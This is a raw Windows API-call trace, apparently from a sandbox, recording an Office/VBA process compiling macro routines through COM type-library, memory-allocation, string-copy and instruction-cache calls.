_wcsicmp (_String1="Terminate", _String2="Delete") returned 16 [0041.938] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.938] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0x15, pFuncDesc=0x4de8440) returned 0x0 [0041.938] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0x15, rgszNames=0x6cbe540*="Terminate", cNames=0x1) returned 0x0 [0041.938] ICreateTypeInfo:LayOut (This=0x6ccf070) returned 0x0 [0041.938] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45e2ac8*(Data1=0x20401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1861e0 | out: ppvObject=0x1861e0*=0x6a6e948) returned 0x0 [0041.938] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45e2ac8*(Data1=0x20401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1861e8 | out: ppvObject=0x1861e8*=0x6ccf078) returned 0x0 [0041.938] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3890) [0041.938] IMalloc:Free (This=0x7feffc15380, pv=0x6bc38c0) [0041.938] IMalloc:Free (This=0x7feffc15380, pv=0x6bc38f0) [0041.938] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3920) [0041.938] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3950) [0041.938] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3980) [0041.938] IMalloc:Free (This=0x7feffc15380, pv=0x6bc39b0) [0041.938] IMalloc:Free (This=0x7feffc15380, pv=0x6bc39e0) [0041.938] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3a10) [0041.938] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3a40) [0041.938] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3a70) [0041.938] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3aa0) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3ad0) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3b00) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3b30) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3b60) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6c32870) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6c32970) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3b90) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3bc0) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3bf0) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3c20) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3c50) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3c80) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3cb0) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6c34690) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6c346b0) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6880730) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x68806f0) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x68806b0) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6880670) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3ce0) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3d10) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6880630) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x68805f0) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3d40) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3d70) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3da0) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3dd0) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x68805b0) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3e00) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3e30) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3e60) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3e90) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6bc3ec0) [0041.939] IUnknown:Release (This=0x6c6be98) returned 0x2 [0041.939] IUnknown:Release (This=0x6ccf078) returned 0x2 [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6ccf0d0) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6ccf130) [0041.939] IMalloc:Free (This=0x7feffc15380, pv=0x6c1e9b0) [0041.939] IUnknown:Release (This=0x6ccf070) returned 0x1 [0041.939] ITypeLib:LocalReleaseTLibAttr (This=0x6c93310) returned 0x1 [0041.939] IUnknown:Release (This=0x6c93310) returned 0x8 [0041.939] IUnknown:Release (This=0x6a6e948) returned 0x3 [0041.939] IUnknown:Release (This=0x6c6be98) returned 0x1 [0041.939] IUnknown:Release (This=0x6c93b88) returned 0x1 [0041.939] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186030 | out: ppvObject=0x186030*=0x0) returned 0x80004002 [0041.939] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186000 | out: ppvObject=0x186000*=0x0) returned 0x80004002 [0041.939] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185ff0 | out: ppvObject=0x185ff0*=0x0) returned 0x80004002 [0041.940] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185ff8 | out: ppvObject=0x185ff8*=0x0) returned 0x80004002 [0041.940] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e948, ppTypeAttr=0x186028, pDummy=0x10 | out: ppTypeAttr=0x186028, pDummy=0x10) returned 0x0 [0041.940] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e948) returned 0x0 [0041.940] IUnknown:AddRef (This=0x6a6e948) returned 0x4 [0041.940] IUnknown:QueryInterface (in: This=0x6ccf078, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186040 | out: ppvObject=0x186040*=0x0) returned 0x80004002 [0041.940] IUnknown:QueryInterface (in: This=0x6ccf078, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186010 | out: ppvObject=0x186010*=0x0) returned 0x80004002 [0041.940] IUnknown:QueryInterface (in: This=0x6ccf078, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186000 | out: ppvObject=0x186000*=0x0) returned 0x80004002 [0041.940] IUnknown:QueryInterface (in: This=0x6ccf078, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186008 | out: ppvObject=0x186008*=0x0) returned 0x80004002 [0041.940] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ccf078, ppTypeAttr=0x186038, pDummy=0x10 | out: ppTypeAttr=0x186038, pDummy=0x10) returned 0x0 [0041.940] ITypeInfo:LocalReleaseTypeAttr (This=0x6ccf078) returned 0x0 [0041.940] IUnknown:AddRef (This=0x6ccf078) returned 0x2 [0041.940] IUnknown:Release (This=0x6a6e948) returned 0x3 [0041.940] IUnknown:Release (This=0x6ccf078) returned 0x1 [0041.940] IUnknown:Release (This=0x6a6e9a8) returned 0x2 [0041.940] IUnknown:Release (This=0x6a6e9a8) returned 0x2 [0041.940] IUnknown:AddRef (This=0x6a6e948) returned 0x5 [0041.940] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e948, ppTypeAttr=0x186280, pDummy=0x0 | out: ppTypeAttr=0x186280, pDummy=0x0) returned 0x0 [0041.940] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e948) returned 0x0 [0041.940] ITypeInfo:GetRefTypeOfImplType (in: This=0x6a6e948, index=0x0, pRefType=0x186278 | out: pRefType=0x186278*=0xd) returned 0x0 [0041.940] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0xd, ppTInfo=0x186288 | out: ppTInfo=0x186288*=0x6bbd1c8) returned 0x0 [0041.940] IUnknown:Release (This=0x6a6e948) returned 0x4 [0041.940] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bbd1c8, ppTypeAttr=0x186280, pDummy=0x185dd0 | out: ppTypeAttr=0x186280, pDummy=0x185dd0*=0x6bbd1c0) returned 0x0 [0041.940] ITypeInfo:LocalReleaseTypeAttr (This=0x6bbd1c8) returned 0x0 [0041.940] ITypeInfo:GetRefTypeOfImplType (in: This=0x6bbd1c8, index=0x0, pRefType=0x186278 | out: pRefType=0x186278*=0x182) returned 0x0 [0041.940] ITypeInfo:GetRefTypeInfo (in: This=0x6bbd1c8, hreftype=0x182, ppTInfo=0x186288 | out: ppTInfo=0x186288*=0x6bbd220) returned 0x0 [0041.941] IUnknown:Release (This=0x6bbd1c8) returned 0x4 [0041.941] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bbd220, ppTypeAttr=0x186280, pDummy=0x186260 | out: ppTypeAttr=0x186280, pDummy=0x186260*=0x186290) returned 0x0 [0041.941] ITypeInfo:LocalReleaseTypeAttr (This=0x6bbd220) returned 0x0 [0041.941] IUnknown:Release (This=0x6bbd220) returned 0x1 [0041.941] IUnknown:Release (This=0x6a6e948) returned 0x3 [0041.941] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x30) returned 0x68805b0 [0041.941] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x5e50000 [0041.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6b9f0dc, cbMultiByte=4, lpWideCharStr=0x5e500dc, cchWideChar=10 | out: lpWideCharStr="case") returned 4 [0041.942] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x412) returned 0x3e66380 [0041.942] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x200) returned 0x6cb8a60 [0041.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ValidateOptionsForm") returned 0x10cbbe [0041.942] strcpy_s (in: _Dst=0x184d50, _DstSize=0x14, _Src="ValidateOptionsForm" | out: _Dst="ValidateOptionsForm") returned 0x0 [0041.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x184d50, cbMultiByte=20, lpWideCharStr=0x184ba0, cchWideChar=20 | out: lpWideCharStr="ValidateOptionsForm") returned 20 [0041.942] IUnknown:AddRef (This=0x6990960) returned 0x8 [0041.942] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="ValidateOptionsForm", lHashVal=0x10cbbe, pfName=0x184c70, pBstrLibName=0x184ba0 | out: pfName=0x184c70*=0, pBstrLibName=0x184ba0) returned 0x0 [0041.942] IUnknown:Release (This=0x6990960) returned 0x7 [0041.942] IUnknown:AddRef (This=0x6992850) returned 0x12 [0041.942] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="ValidateOptionsForm", lHashVal=0x10cbbe, pfName=0x184c70, pBstrLibName=0x184ba0 | out: pfName=0x184c70*=0, pBstrLibName=0x184ba0) returned 0x0 [0041.943] IUnknown:Release (This=0x6992850) returned 0x11 [0041.943] IUnknown:AddRef (This=0x6992df0) returned 0xd [0041.943] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="ValidateOptionsForm", lHashVal=0x10cbbe, pfName=0x184c70, pBstrLibName=0x184ba0 | out: pfName=0x184c70*=0, pBstrLibName=0x184ba0) returned 0x0 [0041.943] IUnknown:Release (This=0x6992df0) returned 0xc [0041.943] IUnknown:AddRef (This=0x6992580) returned 0x7 [0041.943] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="ValidateOptionsForm", lHashVal=0x10cbbe, pfName=0x184c70, pBstrLibName=0x184ba0 | out: pfName=0x184c70*=0, pBstrLibName=0x184ba0) returned 0x0 [0041.943] IUnknown:Release (This=0x6992580) returned 0x6 [0041.943] IUnknown:Release (This=0x6a86110) returned 0x3 [0041.943] IUnknown:Release (This=0x6a86110) returned 0x2 [0041.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5a62b96, cbMultiByte=20, lpWideCharStr=0x184cd0, cchWideChar=21 | out: lpWideCharStr="ValidateOptionsForm") returned 20 [0041.943] ITypeComp:RemoteBind (in: This=0x6a86118, szName="ValidateOptionsForm", lHashVal=0x10cbbe, wFlags=0x1, ppTInfo=0x184c88, pDescKind=0x184c9c, ppFuncDesc=0x184ca0, ppVarDesc=0x7feffd82ca4, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x184c88*=0x0, pDescKind=0x184c9c*=0, ppFuncDesc=0x184ca0, ppVarDesc=0x7feffd82ca4, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0041.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="035de83298", cchWideChar=11, lpMultiByteStr=0x184a00, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="035de83298", lpUsedDefaultChar=0x0) returned 11 [0041.943] GetLocalTime (in: lpSystemTime=0x184ae8 | out: lpSystemTime=0x184ae8*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0x6, wHour=0x16, wMinute=0x1a, wSecond=0x21, wMilliseconds=0x1bf)) [0041.943] _ultow_s (in: _Value=0x5de83299, _Buffer=0x6c69114, _BufferCount=0x9, _Radix=16 | out: _Buffer="5de83299") returned 0x0 [0041.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="085de83299", cchWideChar=11, lpMultiByteStr=0x184a40, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="085de83299", lpUsedDefaultChar=0x0) returned 11 [0041.944] _mbscpy_s (in: _Dst=0x183cb0, _DstSizeInBytes=0x7, _Src=0x38a2ef2 | out: _Dst=0x183cb0) returned 0x0 [0041.945] _mbscpy_s (in: _Dst=0x183cb0, _DstSizeInBytes=0x5, _Src=0x38a2f1a | out: _Dst=0x183cb0) returned 0x0 [0041.945] _mbscpy_s (in: _Dst=0x183cb0, _DstSizeInBytes=0x6, _Src=0x38a2f42 | out: _Dst=0x183cb0) returned 0x0 [0041.945] IMalloc:Free (This=0x7feffc15380, pv=0x67039b0) [0041.945] _mbscpy_s (in: _Dst=0x183cb0, _DstSizeInBytes=0x5, _Src=0x50500a6 | out: _Dst=0x183cb0) returned 0x0 [0041.945] _mbscpy_s (in: _Dst=0x183cb0, _DstSizeInBytes=0x9, _Src=0x50500ce | out: _Dst=0x183cb0) returned 0x0 [0041.945] IMalloc:Free (This=0x7feffc15380, pv=0x67039b0) [0041.945] _mbscpy_s (in: _Dst=0x183cb0, _DstSizeInBytes=0x3, _Src=0x505014e | out: _Dst=0x183cb0) returned 0x0 [0041.945] _mbscpy_s (in: _Dst=0x183cb0, _DstSizeInBytes=0x3, _Src=0x5050172 | out: _Dst=0x183cb0) returned 0x0 [0041.945] IMalloc:Free (This=0x7feffc15380, pv=0x67039b0) [0041.945] _mbscpy_s (in: _Dst=0x183cb0, _DstSizeInBytes=0x5, _Src=0x50501ba | out: _Dst=0x183cb0) returned 0x0 [0041.945] _mbscpy_s (in: _Dst=0x183cb0, _DstSizeInBytes=0x4, _Src=0x50501e2 | out: _Dst=0x183cb0) returned 0x0 [0041.945] _mbscpy_s (in: _Dst=0x183cb0, _DstSizeInBytes=0x5, _Src=0x5050206 | out: _Dst=0x183cb0) returned 0x0 [0041.945] IMalloc:Free (This=0x7feffc15380, pv=0x67039b0) [0041.945] _mbscpy_s (in: _Dst=0x183cb0, _DstSizeInBytes=0x2, _Src=0x505027a | out: _Dst=0x183cb0) returned 0x0 [0041.945] IMalloc:Free (This=0x7feffc15380, pv=0x67039b0) [0041.945] _mbscpy_s (in: _Dst=0x183cb0, _DstSizeInBytes=0x6, _Src=0x5050312 | out: _Dst=0x183cb0) returned 0x0 [0041.945] IMalloc:Free (This=0x7feffc15380, pv=0x67039b0) [0041.945] _mbscpy_s (in: _Dst=0x183cb0, _DstSizeInBytes=0x3, _Src=0x505040e | out: _Dst=0x183cb0) returned 0x0 [0041.945] _mbscpy_s (in: _Dst=0x183cb0, _DstSizeInBytes=0x8, _Src=0x5050432 | out: _Dst=0x183cb0) returned 0x0 [0041.945] _mbscpy_s (in: _Dst=0x183cb0, _DstSizeInBytes=0x6, _Src=0x505045a | out: _Dst=0x183cb0) returned 0x0 [0041.945] IMalloc:Free (This=0x7feffc15380, pv=0x67039b0) [0041.945] _mbscpy_s (in: _Dst=0x183cb0, _DstSizeInBytes=0x5, _Src=0x50504aa | out: _Dst=0x183cb0) returned 0x0 [0041.945] _mbscpy_s (in: _Dst=0x183cb0, _DstSizeInBytes=0x5, _Src=0x50504d2 | out: _Dst=0x183cb0) returned 0x0 [0041.945] IMalloc:Free (This=0x7feffc15380, pv=0x67039b0) [0041.945] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b0a2e0, cb=0x20) returned 0x6bc37a0 [0041.945] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c13fb0, cb=0x28) returned 0x6bc3ec0 [0041.945] strcpy_s (in: _Dst=0x6ca6ee8, _DstSize=0xd, _Src="replacefiles" | out: _Dst="replacefiles") returned 0x0 [0041.945] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x412) returned 0x3e667d0 [0041.946] strcpy_s (in: _Dst=0x6a7c648, _DstSize=0x7, _Src="pointA" | out: _Dst="pointA") returned 0x0 [0041.946] strcpy_s (in: _Dst=0x6a7c658, _DstSize=0x5, _Src="need" | out: _Dst="need") returned 0x0 [0041.946] strcpy_s (in: _Dst=0x6a7c668, _DstSize=0x6, _Src="later" | out: _Dst="later") returned 0x0 [0041.946] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x55) returned 1 [0041.946] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.946] strcpy_s (in: _Dst=0x6ca6f00, _DstSize=0x10, _Src="DataFindSymbols" | out: _Dst="DataFindSymbols") returned 0x0 [0041.946] strcpy_s (in: _Dst=0x6a7c678, _DstSize=0x5, _Src="ext1" | out: _Dst="ext1") returned 0x0 [0041.946] strcpy_s (in: _Dst=0x6a7c688, _DstSize=0x9, _Src="date_max" | out: _Dst="date_max") returned 0x0 [0041.946] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4d) returned 1 [0041.946] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.946] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6caaf50 [0041.946] strcpy_s (in: _Dst=0x6ca6f18, _DstSize=0xe, _Src="files_replace" | out: _Dst="files_replace") returned 0x0 [0041.946] strcpy_s (in: _Dst=0x6a7c6a0, _DstSize=0x3, _Src="C1" | out: _Dst="C1") returned 0x0 [0041.946] strcpy_s (in: _Dst=0x6a7c6b0, _DstSize=0x3, _Src="op" | out: _Dst="op") returned 0x0 [0041.946] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4d) returned 1 [0041.946] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.946] strcpy_s (in: _Dst=0x6ca6f30, _DstSize=0x11, _Src="doc_print_header" | out: _Dst="doc_print_header") returned 0x0 [0041.946] strcpy_s (in: _Dst=0x6a7c6c0, _DstSize=0x5, _Src="str1" | out: _Dst="str1") returned 0x0 [0041.946] strcpy_s (in: _Dst=0x6a7c6d0, _DstSize=0x4, _Src="pty" | out: _Dst="pty") returned 0x0 [0041.946] strcpy_s (in: _Dst=0x6a7c6e0, _DstSize=0x5, _Src="rmin" | out: _Dst="rmin") returned 0x0 [0041.946] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x55) returned 1 [0041.946] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.947] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6cab1a0 [0041.947] strcpy_s (in: _Dst=0x6ca6f50, _DstSize=0xb, _Src="doveryboll" | out: _Dst="doveryboll") returned 0x0 [0041.947] strcpy_s (in: _Dst=0x6a7c6f0, _DstSize=0x2, _Src="m" | out: _Dst="m") returned 0x0 [0041.947] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x45) returned 1 [0041.947] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.947] strcpy_s (in: _Dst=0x6ca6f68, _DstSize=0x14, _Src="ValidateOptionsForm" | out: _Dst="ValidateOptionsForm") returned 0x0 [0041.947] strcpy_s (in: _Dst=0x6a7c700, _DstSize=0x6, _Src="wstr1" | out: _Dst="wstr1") returned 0x0 [0041.947] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x45) returned 1 [0041.947] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.947] strcpy_s (in: _Dst=0x6a7c318, _DstSize=0xe, _Src="CloseDateForm" | out: _Dst="CloseDateForm") returned 0x0 [0041.947] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x3d) returned 1 [0041.947] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.947] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6cab3f0 [0041.947] strcpy_s (in: _Dst=0x6cab668, _DstSize=0x9, _Src="date_now" | out: _Dst="date_now") returned 0x0 [0041.947] strcpy_s (in: _Dst=0x6a7c710, _DstSize=0x3, _Src="b1" | out: _Dst="b1") returned 0x0 [0041.947] strcpy_s (in: _Dst=0x6a7c720, _DstSize=0x8, _Src="control" | out: _Dst="control") returned 0x0 [0041.947] strcpy_s (in: _Dst=0x6a7c730, _DstSize=0x6, _Src="Cell1" | out: _Dst="Cell1") returned 0x0 [0041.947] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x55) returned 1 [0041.947] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.947] strcpy_s (in: _Dst=0x6cab680, _DstSize=0x11, _Src="strings_attached" | out: _Dst="strings_attached") returned 0x0 [0041.947] strcpy_s (in: _Dst=0x6a7c740, _DstSize=0x5, _Src="per2" | out: _Dst="per2") returned 0x0 [0041.947] strcpy_s (in: _Dst=0x6a7c750, _DstSize=0x5, _Src="arg1" | out: _Dst="arg1") returned 0x0 [0041.948] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4d) returned 1 [0041.948] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0041.948] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6cab890 [0041.948] IMalloc:Realloc (This=0x7feffc15380, pv=0x68ea060, cb=0x40) returned 0x6b87340 [0041.948] IMalloc:Realloc (This=0x7feffc15380, pv=0x68ea030, cb=0x50) returned 0x6ccfa90 [0041.948] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x10) returned 0x6c346b0 [0041.948] IMalloc:Realloc (This=0x7feffc15380, pv=0x6703120, cb=0x96) returned 0x6bacef0 [0041.948] IMalloc:Free (This=0x7feffc15380, pv=0x6a67860) [0041.948] GetCurrentProcess () returned 0xffffffffffffffff [0041.948] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6ca67a9, dwSize=0x8) returned 1 [0041.948] GetCurrentProcess () returned 0xffffffffffffffff [0041.948] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6ca67a8, dwSize=0x8) returned 1 [0041.948] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6ca67a9, dwSize=0x8) returned 1 [0041.948] GetCurrentProcess () returned 0xffffffffffffffff [0041.948] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6ca67a8, dwSize=0x8) returned 1 [0041.948] GetCurrentProcess () returned 0xffffffffffffffff [0041.948] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6ca67b8, dwSize=0x2) returned 1 [0041.948] GetCurrentProcess () returned 0xffffffffffffffff [0041.948] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6ca680c, dwSize=0x45) returned 1 [0041.948] VirtualProtect (in: lpAddress=0x6ca680c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18500c | out: lpflOldProtect=0x18500c*=0x40) returned 1 [0041.949] IUnknown:AddRef (This=0x6a861c0) returned 0x7 [0041.949] IUnknown:QueryInterface (in: This=0x6a861c0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1863c8 | out: ppvObject=0x1863c8*=0x0) returned 0x80004002 [0041.949] IUnknown:QueryInterface (in: This=0x6a861c0, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1863c0 | out: ppvObject=0x1863c0*=0x0) returned 0x80004002 [0041.949] IUnknown:Release (This=0x6a861c0) returned 0x6 [0041.949] IMalloc:Alloc (This=0x7feffc15380, cb=0x12) returned 0x6c34690 [0041.949] IMalloc:Free (This=0x7feffc15380, pv=0x6c34690) [0041.949] GetCurrentProcess () returned 0xffffffffffffffff [0041.949] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7bf68, dwSize=0x8) returned 1 [0041.949] IMalloc:Alloc (This=0x7feffc15380, cb=0x11) returned 0x6c34690 [0041.949] IMalloc:Free (This=0x7feffc15380, pv=0x6c34690) [0041.949] GetCurrentProcess () returned 0xffffffffffffffff [0041.949] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7c038, dwSize=0x8) returned 1 [0041.949] IMalloc:Alloc (This=0x7feffc15380, cb=0x11) returned 0x6c34690 [0041.949] IMalloc:Free (This=0x7feffc15380, pv=0x6c34690) [0041.949] GetCurrentProcess () returned 0xffffffffffffffff [0041.949] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab018, dwSize=0x8) returned 1 [0041.949] IMalloc:Alloc (This=0x7feffc15380, cb=0x12) returned 0x6c34690 [0041.949] IMalloc:Free (This=0x7feffc15380, pv=0x6c34690) [0041.949] GetCurrentProcess () returned 0xffffffffffffffff [0041.949] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab0e0, dwSize=0x8) returned 1 [0041.949] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c34690 [0041.949] IMalloc:Free (This=0x7feffc15380, pv=0x6c34690) [0041.949] GetCurrentProcess () returned 0xffffffffffffffff [0041.949] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab270, dwSize=0x8) returned 1 [0041.949] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c34690 [0041.949] IMalloc:Free (This=0x7feffc15380, pv=0x6c34690) [0041.949] GetCurrentProcess () returned 0xffffffffffffffff 